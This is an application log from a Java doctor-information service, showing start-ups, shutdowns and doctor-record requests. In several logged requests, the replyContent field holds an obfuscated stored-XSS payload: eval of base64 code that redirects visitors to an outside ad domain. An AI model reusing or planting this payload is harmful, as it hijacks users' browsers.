11:21:43.669 [nacos-grpc-client-executor-8] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [0516adaf-cd21-457e-a927-efd0dd3867c3] Ack server push request, request = NotifySubscriberRequest, requestId = 1410
11:21:44.623 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 17.596 seconds (JVM running for 18.489)
11:21:44.632 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
11:21:44.632 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
11:21:44.634 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
11:21:44.990 [RMI TCP Connection(5)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
11:24:40.114 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
11:24:40.155 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
11:24:40.484 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
11:24:40.484 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@6f2c6693[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
11:24:40.485 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698376900271_10.100.1.1_62345
11:24:40.487 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@abf7c2d[Running, pool size = 5, active threads = 0, queued tasks = 0, completed tasks = 48]
11:24:40.614 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
11:24:40.616 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
11:24:40.619 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
11:24:40.619 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye
11:24:46.144 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
11:24:47.946 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 36249898-aa9a-40fc-b464-23768cff5430_config-0
11:24:47.993 [main] INFO o.r.Reflections - [scan,232] - Reflections took 25 ms to scan 1 urls, producing 3 keys and 6 values
11:24:48.022 [main] INFO o.r.Reflections - [scan,232] - Reflections took 16 ms to scan 1 urls, producing 4 keys and 9 values
11:24:48.029 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 3 keys and 10 values
11:24:48.038 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 1 keys and 5 values
11:24:48.047 [main] INFO o.r.Reflections - [scan,232] - Reflections took 7 ms to scan 1 urls, producing 1 keys and 7 values
11:24:48.055 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
11:24:48.057 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
11:24:48.058 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800fa39b8
11:24:48.058 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800fa3bc8
11:24:48.058 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
11:24:48.059 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
11:24:48.066 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
11:24:49.353 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698377089631_10.100.1.1_62789
11:24:49.353 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] Notify connected event to listeners.
11:24:49.354 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
11:24:49.354 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [36249898-aa9a-40fc-b464-23768cff5430_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6638
11:24:49.574 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
11:24:51.787 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
11:24:51.787 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
11:24:51.787 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
11:24:51.950 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
11:24:55.207 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
11:24:55.208 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
11:24:55.209 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
11:24:56.272 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
11:24:57.855 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 347006c0-45a5-4b70-84c1-ace62856a615
11:24:57.855 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] RpcClient init label, labels = {module=naming, source=sdk}
11:24:57.856 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
11:24:57.857 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
11:24:57.857 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
11:24:57.858 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
11:24:58.083 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698377098418_10.100.1.1_62799
11:24:58.083 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] Notify connected event to listeners.
11:24:58.083 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
11:24:58.084 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6638
11:25:01.685 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
11:25:01.746 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
11:25:02.190 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] Receive server push request, request = NotifySubscriberRequest, requestId = 1411
11:25:02.193 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [347006c0-45a5-4b70-84c1-ace62856a615] Ack server push request, request = NotifySubscriberRequest, requestId = 1411
11:25:03.178 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 18.833 seconds (JVM running for 20.404)
11:25:03.187 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
11:25:03.188 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
11:25:03.189 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
11:25:03.710 [RMI TCP Connection(5)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
11:25:57.583 [http-nio-10009-exec-2] INFO c.g.d.c.DoctorController - [doctorFind,95] - 功能:回显医生信息 URI:/doctor/doctorFind/1 方法POST 参数:{"consultationPrice":"400.00","departmentId":3,"doctorCareer":"科室主任","doctorField":"新生儿黄痘,肺炎,脑膜炎,呼吸窗迫,新生儿贫血,肺动脉高压等各种新生儿重症的诊断及治疗,掌掘各种呼吸机使用,气管播管。心肺复苏等技术。","doctorHospital":"十堰协和医院","doctorId":1,"doctorName":"张三","doctorPicture":"","personalProfile":"2006年就读广州医学院医学研究生新生儿专业。导师为广东省妇幼保健院张晓庄院长,2009年顺利毕业并就职于广东省好幼保健院新生儿科重症监护室(ICu)。于2011年晋升为主治医师。2014年晋升为副主任医师并于同年共座华南大学医字博士。","replyContent":"<body/onload=e&#x76;&#x61;l&#x28;a&#x74;&#x6f;b&#x28;&#34;d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp&#34;&#x29;&#x29;>","replyStatus":2,"userId":1}
11:27:09.759 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
11:27:09.801 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
11:27:10.133 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
11:27:10.134 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@41013009[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
11:27:10.134 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698377098418_10.100.1.1_62799
11:27:10.137 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@5990bdd5[Running, pool size = 4, active threads = 0, queued tasks = 0, completed tasks = 37]
11:27:10.260 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
11:27:10.262 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
11:27:10.266 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
11:27:10.266 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye
11:27:15.060 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
11:27:16.811 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0
11:27:16.855 [main] INFO o.r.Reflections - [scan,232] - Reflections took 24 ms to scan 1 urls, producing 3 keys and 6 values
11:27:16.875 [main] INFO o.r.Reflections - [scan,232] - Reflections took 9 ms to scan 1 urls, producing 4 keys and 9 values
11:27:16.894 [main] INFO o.r.Reflections - [scan,232] - Reflections took 17 ms to scan 1 urls, producing 3 keys and 10 values
11:27:16.901 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 5 values
11:27:16.908 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 7 values
11:27:16.916 [main] INFO o.r.Reflections - [scan,232] - Reflections took 6 ms to scan 1 urls, producing 2 keys and 8 values
11:27:16.918 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
11:27:16.918 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f64318
11:27:16.918 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f64528
11:27:16.919 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
11:27:16.919 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
11:27:16.925 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
11:27:18.145 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698377238420_10.100.1.1_62928
11:27:18.145 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Notify connected event to listeners.
11:27:18.146 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
11:27:18.146 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
11:27:18.386 [main] INFO c.g.d.DoctorApplication - [logStartupProfileInfo,640] - The following 1 profile is active: "dev"
11:27:20.171 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Initializing ProtocolHandler ["http-nio-10009"]
11:27:20.172 [main] INFO o.a.c.c.StandardService - [log,173] - Starting service [Tomcat]
11:27:20.172 [main] INFO o.a.c.c.StandardEngine - [log,173] - Starting Servlet engine: [Apache Tomcat/9.0.65]
11:27:20.311 [main] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring embedded WebApplicationContext
11:27:23.980 [main] INFO c.a.d.p.DruidDataSource - [init,972] - {dataSource-1,master} inited
11:27:23.981 [main] INFO c.b.d.d.DynamicRoutingDataSource - [addDataSource,148] - dynamic-datasource - add a datasource named [master] success
11:27:23.982 [main] INFO c.b.d.d.DynamicRoutingDataSource - [afterPropertiesSet,228] - dynamic-datasource initial loaded [1] datasource,primary datasource named [master]
11:27:24.858 [main] INFO c.a.c.s.SentinelWebMvcConfigurer - [addInterceptors,52] - [Sentinel Starter] register SentinelWebInterceptor with urlPatterns: [/**].
11:27:26.401 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of b32188fb-93b3-426e-b85d-c62a935def6c
11:27:26.401 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] RpcClient init label, labels = {module=naming, source=sdk}
11:27:26.403 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] RpcClient init, ServerListFactory = com.alibaba.nacos.client.naming.core.ServerListManager
11:27:26.403 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] Registry connection listener to current client:com.alibaba.nacos.client.naming.remote.gprc.redo.NamingGrpcRedoService
11:27:26.403 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] Register server push request handler:com.alibaba.nacos.client.naming.remote.gprc.NamingPushRequestHandler
11:27:26.403 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
11:27:26.650 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698377246970_10.100.1.1_62939
11:27:26.650 [com.alibaba.nacos.client.remote.worker] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] Notify connected event to listeners.
11:27:26.650 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$ConnectResetRequestHandler
11:27:26.650 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] Register server push request handler:com.alibaba.nacos.common.remote.client.RpcClient$$Lambda$476/0x00000008010d6000
11:27:29.808 [main] INFO o.a.c.h.Http11NioProtocol - [log,173] - Starting ProtocolHandler ["http-nio-10009"]
11:27:29.865 [main] INFO c.a.c.n.r.NacosServiceRegistry - [register,75] - nacos registry, DEFAULT_GROUP grail-doctor 192.168.80.1:10009 register finished
11:27:30.344 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] Receive server push request, request = NotifySubscriberRequest, requestId = 1412
11:27:30.346 [nacos-grpc-client-executor-6] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [b32188fb-93b3-426e-b85d-c62a935def6c] Ack server push request, request = NotifySubscriberRequest, requestId = 1412
11:27:31.286 [main] INFO c.g.d.DoctorApplication - [logStarted,61] - Started DoctorApplication in 17.954 seconds (JVM running for 18.83)
11:27:31.294 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor, group=DEFAULT_GROUP
11:27:31.295 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor.yml, group=DEFAULT_GROUP
11:27:31.296 [main] INFO c.a.c.n.r.NacosContextRefresher - [registerNacosListenersForApplications,105] - listening config: dataId=grail-doctor-dev.yml, group=DEFAULT_GROUP
11:27:31.772 [RMI TCP Connection(2)-10.3.214.20] INFO o.a.c.c.C.[.[.[/] - [log,173] - Initializing Spring DispatcherServlet 'dispatcherServlet'
16:29:48.506 [http-nio-10009-exec-1] INFO c.g.d.c.DoctorController - [doctorList,39] - 功能:医生信息 URI:/doctor/doctorList 方法POST 参数:[{"consultationPrice":"400.00","departmentId":3,"doctorCareer":"科室主任","doctorField":"新生儿黄痘,肺炎,脑膜炎,呼吸窗迫,新生儿贫血,肺动脉高压等各种新生儿重症的诊断及治疗,掌掘各种呼吸机使用,气管播管。心肺复苏等技术。","doctorHospital":"十堰协和医院","doctorId":1,"doctorName":"张三","doctorPicture":"","personalProfile":"2006年就读广州医学院医学研究生新生儿专业。导师为广东省妇幼保健院张晓庄院长,2009年顺利毕业并就职于广东省好幼保健院新生儿科重症监护室(ICu)。于2011年晋升为主治医师。2014年晋升为副主任医师并于同年共座华南大学医字博士。","replyContent":"<body/onload=e&#x76;&#x61;l&#x28;a&#x74;&#x6f;b&#x28;&#34;d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp&#34;&#x29;&#x29;>","replyStatus":2,"userId":1}]
16:34:56.005 [http-nio-10009-exec-3] INFO c.g.d.c.DoctorController - [doctorList,39] - 功能:医生信息 URI:/doctor/doctorList 方法POST 参数:[{"consultationPrice":"400.00","departmentId":3,"doctorCareer":"科室主任","doctorField":"新生儿黄痘,肺炎,脑膜炎,呼吸窗迫,新生儿贫血,肺动脉高压等各种新生儿重症的诊断及治疗,掌掘各种呼吸机使用,气管播管。心肺复苏等技术。","doctorHospital":"十堰协和医院","doctorId":1,"doctorName":"张三","doctorPicture":"","personalProfile":"2006年就读广州医学院医学研究生新生儿专业。导师为广东省妇幼保健院张晓庄院长,2009年顺利毕业并就职于广东省好幼保健院新生儿科重症监护室(ICu)。于2011年晋升为主治医师。2014年晋升为副主任医师并于同年共座华南大学医字博士。","replyContent":"<body/onload=e&#x76;&#x61;l&#x28;a&#x74;&#x6f;b&#x28;&#34;d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vd3d3LmhpZ2hjcG1yZXZlbnVlZ2F0ZS5jb20vcmlldWJhN21xP2tleT0xZTBkMTkyZmNjNjcwYzc5MjU0ZmVlYmExNTY5MGNlMSIp&#34;&#x29;&#x29;>","replyStatus":2,"userId":1}]
19:41:28.057 [http-nio-10009-exec-5] INFO c.g.d.c.DoctorController - [doctorInsert,53] - 功能:添加医生信息 URI:/doctor/doctorInsert 方法POST 参数:{"consultationPrice":"200","departmentId":1,"doctorCareer":"护士","doctorField":"肛肠科","doctorHospital":"北京八维","doctorName":"王林涛","doctorPicture":"","personalProfile":"还好","replyContent":"","replyStatus":1,"userId":1}
19:43:17.477 [nacos-grpc-client-executor-5915] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Receive server push request, request = ConfigChangeNotifyRequest, requestId = 1711
19:43:17.478 [nacos-grpc-client-executor-5915] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [e0049b7d-d247-4ba8-ba78-238b38b4bc84_config-0] Ack server push request, request = ConfigChangeNotifyRequest, requestId = 1711
19:43:23.373 [http-nio-10009-exec-7] INFO c.g.d.c.DoctorController - [doctorInsert,53] - 功能:添加医生信息 URI:/doctor/doctorInsert 方法POST 参数:{"consultationPrice":"200","departmentId":1,"doctorCareer":"护士","doctorField":"肛肠科","doctorHospital":"北京八维","doctorName":"王林涛","doctorPicture":"","personalProfile":"还好","replyContent":"","replyStatus":1,"userId":1}
19:43:32.187 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,94] - De-registering from Nacos Server now...
19:43:32.230 [SpringApplicationShutdownHook] INFO c.a.c.n.r.NacosServiceRegistry - [deregister,114] - De-registration finished.
19:43:32.567 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,454] - Shutdown rpc client, set status to shutdown
19:43:32.567 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [shutdown,456] - Shutdown client event executor java.util.concurrent.ScheduledThreadPoolExecutor@45702db6[Running, pool size = 2, active threads = 2, queued tasks = 0, completed tasks = 0]
19:43:32.568 [SpringApplicationShutdownHook] INFO c.a.n.c.r.client - [closeConnection,591] - Close current connection 1698377246970_10.100.1.1_62939
19:43:32.574 [SpringApplicationShutdownHook] INFO c.a.n.c.r.c.g.GrpcClient - [shutdown,85] - Shutdown grpc executor java.util.concurrent.ThreadPoolExecutor@23e160e6[Running, pool size = 4, active threads = 0, queued tasks = 0, completed tasks = 5932]
19:43:32.717 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,205] - dynamic-datasource start closing ....
19:43:32.722 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2051] - {dataSource-1} closing ...
19:43:32.726 [SpringApplicationShutdownHook] INFO c.a.d.p.DruidDataSource - [close,2124] - {dataSource-1} closed
19:43:32.726 [SpringApplicationShutdownHook] INFO c.b.d.d.DynamicRoutingDataSource - [destroy,209] - dynamic-datasource all closed success,bye
19:43:42.682 [background-preinit] INFO o.h.v.i.util.Version - [<clinit>,21] - HV000001: Hibernate Validator 6.2.3.Final
19:43:44.433 [main] INFO c.a.n.c.r.client - [lambda$createClient$0,80] - [RpcClientFactory] create a new rpc client of 388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0
19:43:44.476 [main] INFO o.r.Reflections - [scan,232] - Reflections took 23 ms to scan 1 urls, producing 3 keys and 6 values
19:43:44.496 [main] INFO o.r.Reflections - [scan,232] - Reflections took 9 ms to scan 1 urls, producing 4 keys and 9 values
19:43:44.511 [main] INFO o.r.Reflections - [scan,232] - Reflections took 13 ms to scan 1 urls, producing 3 keys and 10 values
19:43:44.518 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 5 values
19:43:44.525 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 1 keys and 7 values
19:43:44.533 [main] INFO o.r.Reflections - [scan,232] - Reflections took 5 ms to scan 1 urls, producing 2 keys and 8 values
19:43:44.535 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] RpcClient init label, labels = {module=config, Vipserver-Tag=null, source=sdk, Amory-Tag=null, Location-Tag=null, taskId=0, AppName=unknown}
19:43:44.535 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$464/0x0000000800f64318
19:43:44.536 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] Register server push request handler:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$$Lambda$465/0x0000000800f64528
19:43:44.536 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] Registry connection listener to current client:com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$1
19:43:44.536 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] RpcClient init, ServerListFactory = com.alibaba.nacos.client.config.impl.ClientWorker$ConfigRpcTransportClient$2
19:43:44.542 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] Try to connect to server on start up, server: {serverIp = '10.100.1.3', server main port = 8848}
19:43:45.747 [main] INFO c.a.n.c.r.client - [printIfInfoEnabled,60] - [388140a7-dd9c-4486-868e-6e0cdd554f2a_config-0] Success to connect to server [10.100.1.3:8848] on start up, connectionId = 1698407025221_10.100.1.1_63187
